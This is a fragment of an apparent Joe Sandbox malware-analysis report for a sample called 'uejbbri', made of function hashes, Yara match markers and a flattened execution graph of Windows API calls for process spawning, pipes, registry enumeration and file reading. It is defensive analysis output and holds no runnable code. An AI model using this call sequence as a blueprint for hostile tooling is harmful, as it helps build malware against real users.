                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 96436dbf681810cf7d69a3729102a70ad35d228d29e1b3fc52a25a1db227d6fd
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: FFF096325107116BD7603BF5AC8DF6E76E8BF49725F140528E742D1CC0DB74E8458A69

                                                                        Control-flow Graph
                                                                        • Function at 024A0E0F; graph nodes reference SetErrorMode (called twice)
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,024A0223,?,?), ref: 024A0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,024A0223,?,?), ref: 024A0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_24a0000_uejbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 8cb0d109644ce714bdc84d03a3357bbc544987171c927014f260ece32c00e347
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 26D0123114512877DB002A94DC09BCE7B1CDF09B66F008011FB0DDD180C770954046E5

                                                                        Control-flow Graph
                                                                        • Function at 00401991; graph nodes reference Sleep
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: f786c9b48305f926c2fe9aa6a4a640c3689c3b4dd88574010f3490bae00a72b6
                                                                        • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                        • Opcode Fuzzy Hash: f786c9b48305f926c2fe9aa6a4a640c3689c3b4dd88574010f3490bae00a72b6
                                                                        • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                        Control-flow Graph
                                                                        • Function at 004019A9; graph nodes reference Sleep
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 2350c7394a6ede19c9a3da40f224c600cb7e67420b87972ec1723c2f239d6a32
                                                                        • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                        • Opcode Fuzzy Hash: 2350c7394a6ede19c9a3da40f224c600cb7e67420b87972ec1723c2f239d6a32
                                                                        • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                        Control-flow Graph
                                                                        • Function at 004019AF; graph nodes reference Sleep
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 8626c13d4c5bea9750268c441cbe70d84321be4982c5847259c3e7a51e7bc089
                                                                        • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                        • Opcode Fuzzy Hash: 8626c13d4c5bea9750268c441cbe70d84321be4982c5847259c3e7a51e7bc089
                                                                        • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

                                                                        Control-flow Graph
                                                                        • Function at 004019B8; graph nodes reference Sleep
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 7cb05b4a08deaf112b9499aec8d4cd6db564fb490b0e62221787527af13cff27
                                                                        • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                        • Opcode Fuzzy Hash: 7cb05b4a08deaf112b9499aec8d4cd6db564fb490b0e62221787527af13cff27
                                                                        • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

                                                                        Control-flow Graph
                                                                        • Function at 025FEFED; graph nodes reference VirtualAlloc
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 025FF03E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_25ed000_uejbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: a8be367e8d7fd57632fa0a520358ea50f5efcf969faacc22d48af78544e0087c
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 2A112D79A00208EFDB01DF98C989E99BBF5AF08750F058094FA489B761D771EA50DF84

                                                                        Execution Graph

                                                                        Execution Coverage:19.6%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:38.5%
                                                                        Total number of Nodes:818
                                                                        Total number of Limit Nodes:31
API calls 4155->4156 4157 7ff7cb879d24 4156->4157 4157->4115 4158 7ff7cb871990 4 API calls 4157->4158 4159 7ff7cb879d37 4158->4159 4160 7ff7cb8797dc 16 API calls 4159->4160 4161 7ff7cb879d4f 4160->4161 4161->4115 4162 7ff7cb871990 4 API calls 4161->4162 4163 7ff7cb879d62 4162->4163 4164 7ff7cb8797dc 16 API calls 4163->4164 4165 7ff7cb879d7a 4164->4165 4165->4115 4166 7ff7cb871990 4 API calls 4165->4166 4167 7ff7cb879d8d 4166->4167 4168 7ff7cb8797dc 16 API calls 4167->4168 4169 7ff7cb879da5 4168->4169 4169->4115 4170 7ff7cb871990 4 API calls 4169->4170 4171 7ff7cb879db8 4170->4171 4172 7ff7cb8797dc 16 API calls 4171->4172 4173 7ff7cb879dd0 4172->4173 4173->4115 4174 7ff7cb871990 4 API calls 4173->4174 4175 7ff7cb879de3 4174->4175 4175->4175 4176 7ff7cb8797dc 16 API calls 4175->4176 4177 7ff7cb879e43 4176->4177 4177->4115 4178 7ff7cb871990 4 API calls 4177->4178 4179 7ff7cb879e56 4178->4179 4179->4179 4180 7ff7cb8797dc 16 API calls 4179->4180 4181 7ff7cb879eb2 4180->4181 4181->4115 4182 7ff7cb871990 4 API calls 4181->4182 4183 7ff7cb879ec5 4182->4183 4183->4183 4184 7ff7cb8797dc 16 API calls 4183->4184 4185 7ff7cb879f2e 4184->4185 4185->4115 4186 7ff7cb871990 4 API calls 4185->4186 4187 7ff7cb879f41 4186->4187 4187->4187 4188 7ff7cb8797dc 16 API calls 4187->4188 4189 7ff7cb879f9d 4188->4189 4189->4115 4190 7ff7cb871990 4 API calls 4189->4190 4191 7ff7cb879fb4 4190->4191 4191->4191 4192 7ff7cb8797dc 16 API calls 4191->4192 4193 7ff7cb87a006 4192->4193 4193->4115 4194 7ff7cb871990 4 API calls 4193->4194 4195 7ff7cb87a01d 4194->4195 4195->4195 4196 7ff7cb8797dc 16 API calls 4195->4196 4197 7ff7cb87a078 4196->4197 4197->4115 4198 7ff7cb871990 4 API calls 4197->4198 4199 7ff7cb87a092 4198->4199 4199->4199 4200 7ff7cb8797dc 16 API calls 4199->4200 4201 7ff7cb87a0e4 4200->4201 4201->4115 4202 7ff7cb871990 4 API calls 4201->4202 4203 7ff7cb87a0f7 4202->4203 4203->4203 4204 7ff7cb8797dc 16 API calls 4203->4204 4205 7ff7cb87a151 4204->4205 4205->4115 4206 7ff7cb871990 4 API 
calls 4205->4206 4207 7ff7cb87a164 4206->4207 4207->4207 4208 7ff7cb8797dc 16 API calls 4207->4208 4209 7ff7cb87a1bd 4208->4209 4209->4115 4210 7ff7cb871990 4 API calls 4209->4210 4211 7ff7cb87a1d7 4210->4211 4211->4211 4212 7ff7cb8797dc 16 API calls 4211->4212 4213 7ff7cb87a225 4212->4213 4213->4115 4214 7ff7cb871990 4 API calls 4213->4214 4215 7ff7cb87a238 4214->4215 4215->4215 4216 7ff7cb8797dc 16 API calls 4215->4216 4217 7ff7cb87a289 4216->4217 4217->4115 4218 7ff7cb871990 4 API calls 4217->4218 4219 7ff7cb87a29c 4218->4219 4219->4219 4220 7ff7cb8797dc 16 API calls 4219->4220 4221 7ff7cb87a2e6 4220->4221 4221->4115 4222 7ff7cb871990 4 API calls 4221->4222 4223 7ff7cb87a2f9 4222->4223 4223->4223 4224 7ff7cb8797dc 16 API calls 4223->4224 4225 7ff7cb87a347 4224->4225 4225->4115 4226 7ff7cb871990 4 API calls 4225->4226 4227 7ff7cb87a35a 4226->4227 4227->4227 4228 7ff7cb8797dc 16 API calls 4227->4228 4229 7ff7cb87a3a0 4228->4229 4229->4115 4230 7ff7cb871990 4 API calls 4229->4230 4231 7ff7cb87a3b3 4230->4231 4231->4231 4232 7ff7cb8797dc 16 API calls 4231->4232 4233 7ff7cb87a419 4232->4233 4233->4115 4234 7ff7cb871990 4 API calls 4233->4234 4235 7ff7cb87a42c 4234->4235 4235->4235 4236 7ff7cb8797dc 16 API calls 4235->4236 4237 7ff7cb87a47b 4236->4237 4237->4115 4238 7ff7cb871990 4 API calls 4237->4238 4239 7ff7cb87a48a 4238->4239 4239->4239 4240 7ff7cb8797dc 16 API calls 4239->4240 4241 7ff7cb87a4d3 4240->4241 4241->4115 4242 7ff7cb87a4d7 4241->4242 4333 7ff7cb879478 4242->4333 4349 7ff7cb87e7c8 4244->4349 4247 7ff7cb87e7c8 2 API calls 4248 7ff7cb879672 4247->4248 4248->4112 4353 7ff7cb872554 4249->4353 4252 7ff7cb879069 4258 7ff7cb871990 4 API calls 4252->4258 4253 7ff7cb8790a3 CreatePipe 4254 7ff7cb8790e8 CreatePipe 4253->4254 4255 7ff7cb8790c1 4253->4255 4256 7ff7cb879106 4254->4256 4257 7ff7cb879130 4254->4257 4259 7ff7cb871990 4 API calls 4255->4259 4263 7ff7cb871990 4 API calls 4256->4263 4355 7ff7cb877cfc 4257->4355 4260 7ff7cb87907d GetLastError 4258->4260 
4261 7ff7cb8790d5 GetLastError 4259->4261 4262 7ff7cb87908e 4260->4262 4261->4262 4266 7ff7cb871a70 5 API calls 4262->4266 4264 7ff7cb87911a GetLastError 4263->4264 4264->4262 4268 7ff7cb87909c 4266->4268 4267 7ff7cb87917b CreateProcessW 4359 7ff7cb8725b4 4267->4359 4268->4115 4276 7ff7cb8795a0 WaitForSingleObject 4268->4276 4270 7ff7cb8791c7 4271 7ff7cb8791cb 4270->4271 4272 7ff7cb8791f5 CloseHandle 4270->4272 4273 7ff7cb871990 4 API calls 4271->4273 4272->4268 4274 7ff7cb8791df GetLastError 4273->4274 4275 7ff7cb8791f0 4274->4275 4275->4272 4277 7ff7cb879600 4276->4277 4278 7ff7cb8795c3 4276->4278 4277->4119 4279 7ff7cb8795d4 4278->4279 4363 7ff7cb87968c PeekNamedPipe 4278->4363 4279->4277 4281 7ff7cb8795ee GetExitCodeProcess 4279->4281 4282 7ff7cb87968c 6 API calls 4279->4282 4281->4277 4283 7ff7cb8795ea 4282->4283 4283->4277 4283->4281 4285 7ff7cb871990 4 API calls 4284->4285 4286 7ff7cb879813 4285->4286 4286->4286 4287 7ff7cb871990 4 API calls 4286->4287 4288 7ff7cb879877 4287->4288 4377 7ff7cb8779f0 4288->4377 4291 7ff7cb8719e4 4 API calls 4292 7ff7cb87988d 4291->4292 4293 7ff7cb8725b4 2 API calls 4292->4293 4294 7ff7cb879895 4293->4294 4295 7ff7cb871990 4 API calls 4294->4295 4296 7ff7cb8798a4 4295->4296 4381 7ff7cb879224 GetSystemTimeAsFileTime 4296->4381 4299 7ff7cb87e6d8 4 API calls 4300 7ff7cb8798cd 4299->4300 4301 7ff7cb87e6d8 4 API calls 4300->4301 4302 7ff7cb8798ed 4301->4302 4303 7ff7cb871990 4 API calls 4302->4303 4331 7ff7cb8799cf 4302->4331 4305 7ff7cb87993f 4303->4305 4304 7ff7cb871a70 5 API calls 4306 7ff7cb8799ef 4304->4306 4307 7ff7cb879943 4305->4307 4308 7ff7cb879950 4305->4308 4309 7ff7cb871990 4 API calls 4306->4309 4310 7ff7cb8719e4 4 API calls 4307->4310 4312 7ff7cb8779f0 2 API calls 4308->4312 4311 7ff7cb8799fe 4309->4311 4313 7ff7cb87994e 4310->4313 4311->4115 4311->4122 4314 7ff7cb879958 4312->4314 4316 7ff7cb871990 4 API calls 4313->4316 4315 7ff7cb8719e4 4 API calls 4314->4315 4317 7ff7cb879966 4315->4317 4318 7ff7cb87997d 
4316->4318 4319 7ff7cb8725b4 2 API calls 4317->4319 4320 7ff7cb871990 4 API calls 4318->4320 4319->4313 4321 7ff7cb879991 4320->4321 4322 7ff7cb879995 4321->4322 4323 7ff7cb8799a2 4321->4323 4324 7ff7cb8719e4 4 API calls 4322->4324 4325 7ff7cb8779f0 2 API calls 4323->4325 4326 7ff7cb8799a0 4324->4326 4327 7ff7cb8799aa 4325->4327 4329 7ff7cb871990 4 API calls 4326->4329 4328 7ff7cb8719e4 4 API calls 4327->4328 4330 7ff7cb8799b8 4328->4330 4329->4331 4332 7ff7cb8725b4 2 API calls 4330->4332 4331->4304 4332->4326 4403 7ff7cb87971c 4333->4403 4336 7ff7cb8794cf 4337 7ff7cb87968c 6 API calls 4336->4337 4338 7ff7cb8794fc WaitForSingleObject 4336->4338 4340 7ff7cb879540 4336->4340 4347 7ff7cb879534 TerminateProcess 4336->4347 4337->4336 4339 7ff7cb879512 GetSystemTimeAsFileTime 4338->4339 4341 7ff7cb87954d 4338->4341 4339->4336 4340->4115 4341->4340 4342 7ff7cb879563 4341->4342 4343 7ff7cb87968c 6 API calls 4341->4343 4342->4340 4344 7ff7cb87957d GetExitCodeProcess 4342->4344 4345 7ff7cb87968c 6 API calls 4342->4345 4343->4342 4344->4340 4346 7ff7cb87958f CloseHandle 4344->4346 4348 7ff7cb879579 4345->4348 4346->4340 4347->4340 4348->4340 4348->4344 4352 7ff7cb8725dc GetProcessHeap HeapAlloc 4349->4352 4351 7ff7cb87965f 4351->4247 4354 7ff7cb872561 CreatePipe 4353->4354 4354->4252 4354->4253 4356 7ff7cb877d0e 4355->4356 4362 7ff7cb8725dc GetProcessHeap HeapAlloc 4356->4362 4358 7ff7cb877d1d 4358->4267 4360 7ff7cb8725b9 GetProcessHeap HeapFree 4359->4360 4361 7ff7cb8725da 4359->4361 4360->4361 4361->4270 4364 7ff7cb8796c2 4363->4364 4369 7ff7cb8796ca 4363->4369 4364->4369 4370 7ff7cb87e6d8 4364->4370 4367 7ff7cb879701 4374 7ff7cb87e728 4367->4374 4369->4279 4371 7ff7cb8796dc ReadFile 4370->4371 4372 7ff7cb87e6f5 4370->4372 4371->4367 4371->4369 4372->4372 4373 7ff7cb872654 4 API calls 4372->4373 4373->4371 4375 7ff7cb87e6d8 4 API calls 4374->4375 4376 7ff7cb87e73d 4375->4376 4376->4369 4378 7ff7cb877a0d 4377->4378 4380 7ff7cb877a09 4377->4380 4401 7ff7cb8725dc 
GetProcessHeap HeapAlloc 4378->4401 4380->4291 4382 7ff7cb879264 4381->4382 4402 7ff7cb8725dc GetProcessHeap HeapAlloc 4382->4402 4384 7ff7cb8792b1 4385 7ff7cb87971c WriteFile 4384->4385 4386 7ff7cb8792fe 4385->4386 4387 7ff7cb8725b4 GetProcessHeap HeapFree 4386->4387 4392 7ff7cb879306 4387->4392 4388 7ff7cb8793a2 WaitForSingleObject 4390 7ff7cb8793b8 GetSystemTimeAsFileTime 4388->4390 4391 7ff7cb8793f5 4388->4391 4389 7ff7cb87968c 6 API calls 4389->4392 4390->4392 4391->4299 4392->4388 4392->4389 4392->4391 4393 7ff7cb879418 WaitForSingleObject 4392->4393 4397 7ff7cb8793e9 TerminateProcess 4392->4397 4393->4391 4394 7ff7cb87942e 4393->4394 4395 7ff7cb87943e 4394->4395 4398 7ff7cb87968c 6 API calls 4394->4398 4395->4391 4396 7ff7cb879458 GetExitCodeProcess 4395->4396 4399 7ff7cb87968c 6 API calls 4395->4399 4396->4391 4397->4391 4398->4395 4400 7ff7cb879454 4399->4400 4400->4391 4400->4396 4404 7ff7cb87974b 4403->4404 4406 7ff7cb8794ba GetSystemTimeAsFileTime 4404->4406 4407 7ff7cb8797a4 WriteFile 4404->4407 4406->4336 4408 7ff7cb8797c7 4407->4408 4408->4404 4717 7ff7cb87dc08 4718 7ff7cb87dc5c 4717->4718 4719 7ff7cb871990 4 API calls 4718->4719 4720 7ff7cb87dc92 4719->4720 4721 7ff7cb871990 4 API calls 4720->4721 4722 7ff7cb87dca9 4721->4722 4845 7ff7cb87cbf0 RegOpenKeyExW 4722->4845 4724 7ff7cb87dcc9 4725 7ff7cb871990 4 API calls 4724->4725 4726 7ff7cb87dd2c 4725->4726 4727 7ff7cb871990 4 API calls 4726->4727 4728 7ff7cb87dd43 4727->4728 4729 7ff7cb87ccf4 6 API calls 4728->4729 4730 7ff7cb87dd68 4729->4730 4731 7ff7cb87deaf 4730->4731 4733 7ff7cb87dd7c PathCombineW PathFileExistsW 4730->4733 4732 7ff7cb871990 4 API calls 4731->4732 4734 7ff7cb87debe 4732->4734 4735 7ff7cb87de9c 4733->4735 4736 7ff7cb87dda2 PathQuoteSpacesW 4733->4736 4740 7ff7cb871990 4 API calls 4734->4740 4737 7ff7cb8725b4 2 API calls 4735->4737 4851 7ff7cb87cfec 4736->4851 4737->4731 4739 7ff7cb87ddb8 lstrcatW 4853 7ff7cb87e8a0 4739->4853 4742 7ff7cb87ded5 4740->4742 4744 7ff7cb87cbf0 4 API 
calls 4742->4744 4746 7ff7cb87deee 4744->4746 4745 7ff7cb879644 2 API calls 4749 7ff7cb87dde2 4745->4749 4747 7ff7cb871990 4 API calls 4746->4747 4748 7ff7cb87df0a 4747->4748 4750 7ff7cb871990 4 API calls 4748->4750 4749->4749 4752 7ff7cb87900c 16 API calls 4749->4752 4751 7ff7cb87df19 4750->4751 4755 7ff7cb871990 4 API calls 4751->4755 4753 7ff7cb87de37 4752->4753 4754 7ff7cb8795a0 8 API calls 4753->4754 4759 7ff7cb87de7d 4753->4759 4756 7ff7cb87de4c 4754->4756 4757 7ff7cb87df30 4755->4757 4758 7ff7cb87de73 4756->4758 4760 7ff7cb8797dc 16 API calls 4756->4760 4761 7ff7cb87df3c GetEnvironmentVariableW 4757->4761 4762 7ff7cb879478 13 API calls 4758->4762 4763 7ff7cb8725b4 2 API calls 4759->4763 4764 7ff7cb87de60 4760->4764 4765 7ff7cb87df65 4761->4765 4766 7ff7cb87e1e3 4761->4766 4762->4759 4763->4735 4764->4758 4769 7ff7cb871990 4 API calls 4764->4769 4770 7ff7cb87df71 PathAppendW PathFileExistsW 4765->4770 4767 7ff7cb871990 4 API calls 4766->4767 4768 7ff7cb87e1f2 4767->4768 4773 7ff7cb871990 4 API calls 4768->4773 4769->4758 4770->4766 4771 7ff7cb87df96 CreateFileW 4770->4771 4771->4766 4772 7ff7cb87dfcb GetFileSize 4771->4772 4860 7ff7cb8725dc GetProcessHeap HeapAlloc 4772->4860 4775 7ff7cb87e209 4773->4775 4779 7ff7cb87cbf0 4 API calls 4775->4779 4780 7ff7cb87e226 4779->4780 4784 7ff7cb871990 4 API calls 4780->4784 4786 7ff7cb87e242 4784->4786 4789 7ff7cb871990 4 API calls 4786->4789 4790 7ff7cb87e259 4789->4790 4794 7ff7cb87e265 GetEnvironmentVariableW 4790->4794 4795 7ff7cb87e378 4794->4795 4796 7ff7cb87e288 4794->4796 4798 7ff7cb871990 4 API calls 4795->4798 4799 7ff7cb87e294 PathAppendW PathFileExistsW 4796->4799 4800 7ff7cb87e387 4798->4800 4799->4795 4803 7ff7cb87e2b9 CreateFileW 4799->4803 4804 7ff7cb871990 4 API calls 4800->4804 4803->4795 4808 7ff7cb87e2ee GetFileSize 4803->4808 4809 7ff7cb87e396 4804->4809 4861 7ff7cb872588 GetProcessHeap HeapAlloc 4808->4861 4846 7ff7cb87ccd3 4845->4846 4847 7ff7cb87cc43 RegEnumKeyExW 4845->4847 4846->4724 4848 
7ff7cb87cc79 RegEnumKeyExW 4847->4848 4849 7ff7cb87ccc8 RegCloseKey 4847->4849 4848->4849 4849->4846 4852 7ff7cb87d047 4851->4852 4852->4739 4854 7ff7cb87e7c8 2 API calls 4853->4854 4855 7ff7cb87e8bf 4854->4855 4862 7ff7cb87e74c 4855->4862 4858 7ff7cb87e6d8 4 API calls 4859 7ff7cb87ddd5 4858->4859 4859->4745 4863 7ff7cb87e793 4862->4863 4865 7ff7cb87e767 4862->4865 4863->4858 4864 7ff7cb87e6d8 4 API calls 4864->4865 4865->4863 4865->4864 4866 7ff7cb8714d4 4867 7ff7cb871507 4866->4867 4868 7ff7cb8714ea 4866->4868 4868->4867 4869 7ff7cb871501 RemoveVectoredExceptionHandler 4868->4869 4869->4867 4870 7ff7cb8768d4 4871 7ff7cb8768f7 4870->4871 4872 7ff7cb877234 5 API calls 4871->4872 4873 7ff7cb876971 4872->4873 4874 7ff7cb877234 5 API calls 4873->4874 4875 7ff7cb876990 4874->4875 4876 7ff7cb877234 5 API calls 4875->4876 4877 7ff7cb8769af 4876->4877 4878 7ff7cb8772d4 5 API calls 4877->4878 4879 7ff7cb8769ce 4878->4879 4880 7ff7cb876054 4881 7ff7cb876077 4880->4881 4882 7ff7cb877234 5 API calls 4881->4882 4883 7ff7cb8760f1 4882->4883 4884 7ff7cb877234 5 API calls 4883->4884 4885 7ff7cb876110 4884->4885 4886 7ff7cb877234 5 API calls 4885->4886 4887 7ff7cb87612f 4886->4887 4888 7ff7cb877234 5 API calls 4887->4888 4889 7ff7cb87619e 4888->4889 4890 7ff7cb877234 5 API calls 4889->4890 4891 7ff7cb8761bd 4890->4891 4892 7ff7cb8772d4 5 API calls 4891->4892 4893 7ff7cb8761dc 4892->4893 4894 7ff7cb876b94 4895 7ff7cb876bbf 4894->4895 4896 7ff7cb877234 5 API calls 4895->4896 4897 7ff7cb876c2e 4896->4897 4898 7ff7cb877234 5 API calls 4897->4898 4899 7ff7cb876c9d 4898->4899 4900 7ff7cb877234 5 API calls 4899->4900 4901 7ff7cb876d09 4900->4901 4902 7ff7cb87e4d0 lstrcpyW PathAppendW 4903 7ff7cb87e51c 4902->4903 4904 7ff7cb87ccf4 6 API calls 4903->4904 4905 7ff7cb87e537 4904->4905 4906 7ff7cb87e5ea 4905->4906 4907 7ff7cb871990 4 API calls 4905->4907 4908 7ff7cb87e556 4907->4908 4909 7ff7cb8719e4 4 API calls 4908->4909 4910 7ff7cb87e561 4909->4910 4911 7ff7cb871990 4 API calls 4910->4911 
4912 7ff7cb87e578 4911->4912 4913 7ff7cb8719e4 4 API calls 4912->4913 4914 7ff7cb87e587 4913->4914 4914->4914 4915 7ff7cb871990 4 API calls 4914->4915 4916 7ff7cb87e5de 4915->4916 4917 7ff7cb8725b4 2 API calls 4916->4917 4917->4906 4002 7ff7cb8773fc 4003 7ff7cb87743f 4002->4003 4004 7ff7cb871990 4 API calls 4003->4004 4005 7ff7cb87746e 4004->4005 4050 7ff7cb871a70 4005->4050 4007 7ff7cb877490 4008 7ff7cb871a70 5 API calls 4007->4008 4009 7ff7cb8774a4 4008->4009 4053 7ff7cb8778ec 4009->4053 4012 7ff7cb871990 4 API calls 4013 7ff7cb8774c5 4012->4013 4014 7ff7cb871a70 5 API calls 4013->4014 4015 7ff7cb8774d9 4014->4015 4059 7ff7cb8779c4 GetNativeSystemInfo 4015->4059 4018 7ff7cb871990 4 API calls 4019 7ff7cb8774fa 4018->4019 4061 7ff7cb877138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4019->4061 4021 7ff7cb877503 4026 7ff7cb8775d1 4021->4026 4062 7ff7cb87785c 4021->4062 4022 7ff7cb87783c 4073 7ff7cb877104 4022->4073 4026->4022 4027 7ff7cb87785c 5 API calls 4026->4027 4030 7ff7cb877629 4027->4030 4028 7ff7cb87755b 4029 7ff7cb87785c 5 API calls 4028->4029 4032 7ff7cb877596 4029->4032 4031 7ff7cb87785c 5 API calls 4030->4031 4034 7ff7cb877664 4031->4034 4033 7ff7cb87785c 5 API calls 4032->4033 4033->4026 4035 7ff7cb87785c 5 API calls 4034->4035 4036 7ff7cb87769f 4035->4036 4037 7ff7cb87785c 5 API calls 4036->4037 4038 7ff7cb8776da 4037->4038 4039 7ff7cb87785c 5 API calls 4038->4039 4040 7ff7cb877715 4039->4040 4041 7ff7cb87785c 5 API calls 4040->4041 4042 7ff7cb877750 4041->4042 4043 7ff7cb87785c 5 API calls 4042->4043 4044 7ff7cb87778b 4043->4044 4045 7ff7cb87785c 5 API calls 4044->4045 4046 7ff7cb8777c6 4045->4046 4047 7ff7cb87785c 5 API calls 4046->4047 4048 7ff7cb877801 4047->4048 4049 7ff7cb87785c 5 API calls 4048->4049 4049->4022 4051 7ff7cb871918 4 API calls 4050->4051 4052 7ff7cb871a96 wvsprintfW 4051->4052 4052->4007 4054 7ff7cb877918 4053->4054 4055 7ff7cb877977 LoadLibraryA GetProcAddress 4054->4055 4056 7ff7cb8774a9 4055->4056 4057 7ff7cb877991 
GetCurrentProcess IsWow64Process 4055->4057 4056->4012 4057->4056 4058 7ff7cb8779ad 4057->4058 4058->4056 4060 7ff7cb8774de 4059->4060 4060->4018 4061->4021 4063 7ff7cb871990 4 API calls 4062->4063 4064 7ff7cb877888 4063->4064 4065 7ff7cb871990 4 API calls 4064->4065 4066 7ff7cb877893 4065->4066 4067 7ff7cb871990 4 API calls 4066->4067 4068 7ff7cb8778a2 4067->4068 4076 7ff7cb877034 4068->4076 4071 7ff7cb871990 4 API calls 4072 7ff7cb8778d5 4071->4072 4072->4028 4074 7ff7cb877116 CoUninitialize 4073->4074 4078 7ff7cb877079 4076->4078 4077 7ff7cb87707d 4077->4071 4078->4077 4080 7ff7cb876004 4078->4080 4081 7ff7cb87601a 4080->4081 4084 7ff7cb877234 4081->4084 4093 7ff7cb877310 4084->4093 4087 7ff7cb876042 4088 7ff7cb877260 4091 7ff7cb871990 4 API calls 4088->4091 4089 7ff7cb871990 4 API calls 4090 7ff7cb877275 4089->4090 4092 7ff7cb8719e4 4 API calls 4090->4092 4091->4087 4092->4088 4094 7ff7cb87733e 4093->4094 4095 7ff7cb877381 4094->4095 4097 7ff7cb877362 4094->4097 4096 7ff7cb8773bb 4095->4096 4098 7ff7cb877395 4095->4098 4099 7ff7cb871990 4 API calls 4096->4099 4101 7ff7cb871a70 5 API calls 4097->4101 4104 7ff7cb871a70 5 API calls 4098->4104 4100 7ff7cb8773ca 4099->4100 4103 7ff7cb871990 4 API calls 4100->4103 4102 7ff7cb877251 4101->4102 4102->4087 4102->4088 4102->4089 4105 7ff7cb8773d5 4103->4105 4104->4102 4106 7ff7cb871990 4 API calls 4105->4106 4106->4102 4925 7ff7cb87ecb8 4926 7ff7cb87ece6 4925->4926 4938 7ff7cb87ee03 4925->4938 4926->4938 4939 7ff7cb8725dc GetProcessHeap HeapAlloc 4926->4939 4940 7ff7cb87c378 4941 7ff7cb87c38b 4940->4941 4942 7ff7cb871990 4 API calls 4941->4942 4943 7ff7cb87c396 4942->4943 4958 7ff7cb87c544 4943->4958 5042 7ff7cb87e940 4958->5042 5063 7ff7cb8725dc GetProcessHeap HeapAlloc 5042->5063 5151 7ff7cb8761f8 5152 7ff7cb87620e 5151->5152 5153 7ff7cb877234 5 API calls 5152->5153 5154 7ff7cb87623c 5153->5154 5155 7ff7cb877234 5 API calls 5154->5155 5156 7ff7cb87625c 5155->5156 5172 7ff7cb87ec04 5173 7ff7cb87ec1b 5172->5173 5175 
